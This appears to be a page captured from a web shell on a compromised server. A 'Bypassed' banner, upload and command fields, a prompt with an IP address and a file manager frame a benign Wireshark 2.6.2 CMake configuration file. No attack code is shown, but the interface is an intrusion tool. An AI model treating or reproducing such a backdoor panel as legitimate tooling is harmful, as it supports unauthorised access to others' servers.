[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.217.113: ~ $
set(Wireshark_MAJOR_VERSION "2" )
set(Wireshark_MINOR_VERSION "6" )
set(Wireshark_PATCH_VERSION "2" )
set(Wireshark_VERSION 2.6.2)
set(Wireshark_VERSION_STRING "2.6.2")

set(Wireshark_INSTALL_DIR        "/usr")
set(Wireshark_PLUGIN_INSTALL_DIR "/usr/lib64/wireshark/plugins/2.6")

set(Wireshark_LIB_DIR           "/usr/lib64")
set(Wireshark_INCLUDE_DIR       "/usr/include/wireshark")
set(Wireshark_CMAKE_MODULES_DIR "lib64/wireshark")

find_library( Wireshark_LIBRARY
	NAMES
		wireshark
		libwireshark
	HINTS
		${Wireshark_LIB_DIR}
	PATHS
		/opt/lib/
		/usr/lib64
		/usr/lib
)

Filemanager

Name Type Size Permission Actions
extcap Folder 0755
plugins Folder 0755
FindGLIB2.cmake File 2.85 KB 0644
FindWSWinLibs.cmake File 1.04 KB 0644
FindWireshark.cmake File 888 B 0644
LocatePythonModule.cmake File 1.92 KB 0644
UseAsn2Wrs.cmake File 2.72 KB 0644
UseMakePluginReg.cmake File 452 B 0644
WiresharkConfig.cmake File 578 B 0644
WiresharkConfigVersion.cmake File 300 B 0644